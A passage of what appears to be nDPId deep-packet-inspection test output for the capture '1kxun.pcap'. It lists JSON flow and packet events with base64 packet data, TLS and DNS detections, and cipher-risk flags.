amwWHcBAQbXCOcOftYxPyyUfYlmBS91ssyfM9KHAYAPjuptOjnLxGz2x9TbNHcI4nTKruVWTV9ktQaEfrdpb\/HDqnCQBNGReenZ\/zWZ\/GfJml4Cm+qteZq9C64lEHb9+XokUZOr8X2s3gyZpMYfRa5jmhmO9xmHg7WJrK4eIDuKfpKwBJ058yTVyD7l0KDSW9GneGAGkjet6prc4idVI6G79csJZdQxaibq52QgAy0phRLTPkicoq0gLlZcIZm+Mml46cJhhEv0H26dA+KCoM5R5DwKEyBjuFs1QF3Y4+SDB+bc1Wt792AR8qtKWp6gbS96vJnCeIhTEA3KFLfapTzgvIE4vSB7KreGQj+tnmHbTp1DHeV+7y4PmFv5on7p4A6CEwD6f6fjePEHDfs2g0EYheGp2VL2NvXgnD2ikpgTUWxxOX40I6u2o6OTbP2RNpQ9m8KCHjwUMiisO3DyvkoNm8lZ6ZPWkev9k5y7txVdM8LiyyQoSG929RxmQGshqjjCdAsjAk+bbGLy98uGf3QTIpvsX0AlZ7fP\/qiRzGtQg=="}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1088,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1470104414296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414296,"pkt":"ABAj4ACgYMVHBbyMCABFAABAzwZAAEAGcgXAqAUQwKhzS9F6Abs0INrqAAAAALAC\/\/+nvgAAAgQFtAEDAwUBAQgKGg+ZQgAAAAAEAgAA"}
01404{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1470104414296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":759,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":759,"pkt_l4_len":725,"thread_ts_msec":1470104414296,"pkt":"TF4M6gNlYMVHBbyMCABFAALpkqNAAEAGaYLAqAUQHw1XJNFMAbv8UnEzBJ2iMIAYEABq4wAAAQEIChoPmUJf7iUmFwMDArD5LAelFwFlufuyco4s\/\/Qvv+UsF7KG3W2aXVv9903LV87nxtNAIzAtPlUtxAIPT+QYQYOyjbvxtQ+Q3w2BeXCdTeBc2Vvhlyi2kFxwf1jLqB8jaDJwivP\/xGW9s5xZd+K0vcco68WAGVVhFXALDf8rp7nos7l2c3eCb9+ciqE2R8G8Pf4MZ5pCC83zl7gfBWwkh4JHUeVVNouVvCgmUz7pPOU27GiOZYmbf0iAqd6+kgzDqsVjJGMyvKT\/fOgiH+fRlxhK8fgLFTMvUw6JGt\/UsaYL4RE69L+mCP1NuNnyVxeorLPVKIVZ13X2miaLYk2DWr9BibPpp3QKFrWmy8E3NKq4Ls+dcN8upVmfmDj7xZcV58HYFhdLrgO56pzKogay7LJ\/Pef6DyPMYVTwySpdKas1Aq+IzlVKtxcR8k6I3pw5YMLWtutrLSrH5ABSNgfMJjpr7KO2g8MPyxfJHjp2vDiI+ruSCa4CqxUVcHS+ZRTOUS6b9R2wmUCu6Y6KCOkMK6zLaxdsVh2SuDnapzRD7fveixQuUMvdOAMX7X4K41IkMkOElwsydkORTyAInVQi4oBSOBugr0DMtesGCV044xeQCLnW8sd4RkMZjJZ4QhcfoxPlJX+f43AY0PNflsTA9yNhamZf4IabRxMggb\/lds0+jUTPyPfEWIc3bobDla0SyHhLFLXgk1Ee+Oe4AxYayqQxnLn\/4p\/VoNfV4WOaHdYeCMPZ3SK54BPrr3dXSTfyhV2DUhdJ\/67K7IkFW2cC4kKBJWWCDD28cyiCT6LF9mykZ0ExSXEgjBCLfnxWyJ4aekEg78E+rUf7kdSBDRTW3tDoKcMJPCumkIQ5L3nUbGzQ3I0QnDhkpOFdM4JoimsOVpik4zef5xLCds4Ul8v94jeMaHT0fOcIvOZn5GhO"}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1470104414301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414301,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XokV4DmNCDa64ASFtDXBQAAAgQFtAEBBAIBAwMH"}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414301,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0wvZAAFgGI+QfDVckwKgFEAG70UwEnaIw\/FJxM4AQAQMsTQAAAQEICl\/vEucaD5lC"}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104414301,"pkt":"ABAj4ACgYMVHBbyMCABFAAAohwxAAEAGuhfAqAUQwKhzS9F6Abs0INrrJFeA51AQIAAOqAAAIEVKRkRF"}
00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1099,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414296,"flow_last_seen":1470104414302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104414302,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104414296,"flow_last_seen":1470104414305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104414305,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7560000,"flow_min_l4_payload_len":1093,"flow_max_l4_payload_len":1093,"flow_tot_l4_payload_len":1093,"flow_avg_l4_payload_len":1093,"midstream":1,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1470104414296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1159,"pkt_l4_len":1125,"thread_ts_msec":1470104414296,"pkt":"TF4M6gNlYMVHBbyMCABFAAR5Xv9AAEAGm5bAqAUQHw1XJNFMAbv8UmzuBJ2iMIAYEABHkgAAAQEIChoPmUJf7iUmFwMDBEAsTuFq8CapSbqPXvcdxKrSs42tBtoxpkpEhbC8nI\/Z9Ti9iLIQZa5j5LW58IaLnxvFb3pZI+B1RxFJh1MX7hfwSESpGA\/xdeEaXYqNDQOsIrAzCG5XHIwlKsfFfn\/8RQrusMspya+fP6t\/Zg2Y6qSh9wcmn8mXJja+baLib9aevB6ce5XBs3a64vsRCgFs5NXASh55KEqD8yMaqdrRhlWFE6xGr6+SpmMLlVUwh48nOg1sBDe\/WYgSpLNk63+28tyTAwCIcOk3y10vOsyt7ZjgvztDnWOLtsn7\/6kMi3u2RdUB7eGGzM2NovPfgy\/qKgW2LAn44liW9WewObR4bp+dPFEvC0Y3+SW5bib2uvhBosFVLRK5YrZcwALZJXqqXhrrs6bu\/ljawzwGUMfLGQ2WSbwafdg9dJ73rdMEF1vEvfkETGUyJeWyPgg2G2DdxVtAlhAOni2Cb6JW3jV3kUvfm9gPSADxqT1QqjMQAvLuAsUt5WChMz4yp18RafOK\/1ZUrwxEzqELsHqkpHQf4ILnKSgg5+kGWAcGpm5BV27qLCy+WyMYEnVR9nevFTvw2OV3haLNTqpyfd4K7vOAMw+dbscVa9MHAeqcd7IQnXV8FbWdFXkC4wCM4E8hTvbfJf2QumZQ2fXLtiYd3sw8qoFpqMjmllDchFzska7DS7GVif4h6CnDNlZ4V+i1Eng9ELpwqlbXjyiEgMAhv7fPmI8e61K\/2gGY8OMdxcNsyD40PLGc9n2gJgcjUdhv3yk5lS0wyxma1JJ1Pa0sEMzvHL8CT6BpEzwkMJEMkciKtJ6VsJyummJhpN5MU9bS0CfSvwU0ARZvT+jD4m9Xd2enHnLuDwg4KR5SAhfN1vXfVfNlzPARDhSaBSDDpj8POKqEg5amwWHcBAQbXCOcOftYxPyyUfYlmBS91ssyfM9KHAYAPjuptOjnLxGz2x9TbNHcI4nTKruVWTV9ktQaEfrdpb\/HDqnCQBNGReenZ\/zWZ\/GfJml4Cm+qteZq9C64lEHb9+XokUZOr8X2s3gyZpMYfRa5jmhmO9xmHg7WJrK4eIDuKfpKwBJ058yTVyD7l0KDSW9GneGAGkjet6prc4idVI6G79csJZdQxaibq52QgAy0phRLTPkicoq0gLlZcIZm+Mml46cJhhEv0H26dA+KCoM5R5DwKEyBjuFs1QF3Y4+SDB+bc1Wt792AR8qtKWp6gbS96vJnCeIhTEA3KFLfapTzgvIE4vSB7KreGQj+tnmHbTp1DHeV+7y4PmFv5on7p4A6CEwD6f6fjePEHDfs2g0EYheGp2VL2NvXgnD2ikpgTUWxxOX40I6u2o6OTbP2RNpQ9m8KCHjwUMiisO3DyvkoNm8lZ6ZPWkev9k5y7txVdM8LiyyQoSG929RxmQGshqjjCdAsjAk+bbGLy98uGf3QTIpvsX0AlZ7fP\/qiRzGtQg=="}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1088,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1470104414296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414296,"pkt":"ABAj4ACgYMVHBbyMCABFAABAzwZAAEAGcgXAqAUQwKhzS9F6Abs0INrqAAAAALAC\/\/+nvgAAAgQFtAEDAwUBAQgKGg+ZQgAAAAAEAgAA"}
01404{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1470104414296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":759,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":759,"pkt_l4_len":725,"thread_ts_msec":1470104414296,"pkt":"TF4M6gNlYMVHBbyMCABFAALpkqNAAEAGaYLAqAUQHw1XJNFMAbv8UnEzBJ2iMIAYEABq4wAAAQEIChoPmUJf7iUmFwMDArD5LAelFwFlufuyco4s\/\/Qvv+UsF7KG3W2aXVv9903LV87nxtNAIzAtPlUtxAIPT+QYQYOyjbvxtQ+Q3w2BeXCdTeBc2Vvhlyi2kFxwf1jLqB8jaDJwivP\/xGW9s5xZd+K0vcco68WAGVVhFXALDf8rp7nos7l2c3eCb9+ciqE2R8G8Pf4MZ5pCC83zl7gfBWwkh4JHUeVVNouVvCgmUz7pPOU27GiOZYmbf0iAqd6+kgzDqsVjJGMyvKT\/fOgiH+fRlxhK8fgLFTMvUw6JGt\/UsaYL4RE69L+mCP1NuNnyVxeorLPVKIVZ13X2miaLYk2DWr9BibPpp3QKFrWmy8E3NKq4Ls+dcN8upVmfmDj7xZcV58HYFhdLrgO56pzKogay7LJ\/Pef6DyPMYVTwySpdKas1Aq+IzlVKtxcR8k6I3pw5YMLWtutrLSrH5ABSNgfMJjpr7KO2g8MPyxfJHjp2vDiI+ruSCa4CqxUVcHS+ZRTOUS6b9R2wmUCu6Y6KCOkMK6zLaxdsVh2SuDnapzRD7fveixQuUMvdOAMX7X4K41IkMkOElwsydkORTyAInVQi4oBSOBugr0DMtesGCV044xeQCLnW8sd4RkMZjJZ4QhcfoxPlJX+f43AY0PNflsTA9yNhamZf4IabRxMggb\/lds0+jUTPyPfEWIc3bobDla0SyHhLFLXgk1Ee+Oe4AxYayqQxnLn\/4p\/VoNfV4WOaHdYeCMPZ3SK54BPrr3dXSTfyhV2DUhdJ\/67K7IkFW2cC4kKBJWWCDD28cyiCT6LF9mykZ0ExSXEgjBCLfnxWyJ4aekEg78E+rUf7kdSBDRTW3tDoKcMJPCumkIQ5L3nUbGzQ3I0QnDhkpOFdM4JoimsOVpik4zef5xLCds4Ul8v94jeMaHT0fOcIvOZn5GhO"}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1470104414301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414301,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XokV4DmNCDa64ASFtDXBQAAAgQFtAEBBAIBAwMH"}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414301,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0wvZAAFgGI+QfDVckwKgFEAG70UwEnaIw\/FJxM4AQAQMsTQAAAQEICl\/vEucaD5lC"}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104414301,"pkt":"ABAj4ACgYMVHBbyMCABFAAAohwxAAEAGuhfAqAUQwKhzS9F6Abs0INrrJFeA51AQIAAOqAAAIEVKRkRF"}
00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1099,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414296,"flow_last_seen":1470104414302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104414302,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104414296,"flow_last_seen":1470104414305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104414305,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414395,"flow_last_seen":1470104414395,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1470104414395,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1470104414395,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1470104414395,"pkt":"TF4M6gNlYMVHBbyMCABFAABL64oAAP8RYP7AqAUQqF8BAfeMADUAN6RcbYwBAAABAAAAAAAABmRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwAAABAAE="}
00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414395,"flow_last_seen":1470104414395,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1470104414395,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"dl-obs.official.line.naver.jp","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00770{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1470104414402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1470104414402,"pkt":"ABxCjnAxTF4M6gNlCABFAAET0UQAAPgRgXyoXwEBwKgFEAA194wA\/yfZbYyBgAABAAYAAAAABmRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwAAABAAHADAAFAAEAAUxDAC0GZGwtb2JzCG9mZmljaWFsBGxpbmUFbmF2ZXICanAJZWRnZXN1aXRlA25ldADAOwAFAAEAAACwADUKY2FjLWRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwCWxpbmUtemVybwZha2FkbnPAY8B0AAUAAQAAAQAAEgVhMTg2NwJnMgZha2FtYWnAY8C1AAEAAQAAAAUABMtFUUnAtQABAAEAAAAFAATLRVFCwLUAAQABAAAABQAEPdw+2g=="}
00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1470104414402,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"dl-obs.official.line.naver.jp","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.69.81.73"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1470104414404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414404,"pkt":"TF4M6gNlYMVHBbyMCABFAABA+kNAAEAGXi3AqAUQy0VRSdF7AFCoMQrOAAAAALAC\/\/8cMAAAAgQFtAEDAwUBAQgKGg+ZqwAAAAAEAgAA"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1116,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1116,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1470104414404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414404,"pkt":"TF4M6gNlYMVHBbyMCABFAABAQJ1AAEAGF9TAqAUQy0VRSdF8AFD2CJDQAAAAALAC\/\/9IVAAAAgQFtAEDAwUBAQgKGg+ZrAAAAAAEAgAA"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1117,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1470104414407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104414407,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADsGXXXLRVFJwKgFEABQ0Xu\/8FK8qDEKz6AScSAwjAAAAgQFtAQCCAobhF1GGg+ZqwEDAwU="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1118,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0pGZAAEAGtBbAqAUQy0VRSdF7AFCoMQrPv\/BSvYAQEBXAXgAAAQEIChoPma4bhF1G"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1470104414407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104414407,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADsGXXXLRVFJwKgFEABQ0Xzxz9ee9giQ0aAScSCl7QAAAgQFtAQCCAobhF1HGg+ZrAEDAwU="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0fmZAAEAG2hbAqAUQy0VRSdF8AFD2CJDR8c\/Xn4AQEBU1wQAAAQEIChoPma4bhF1H"}
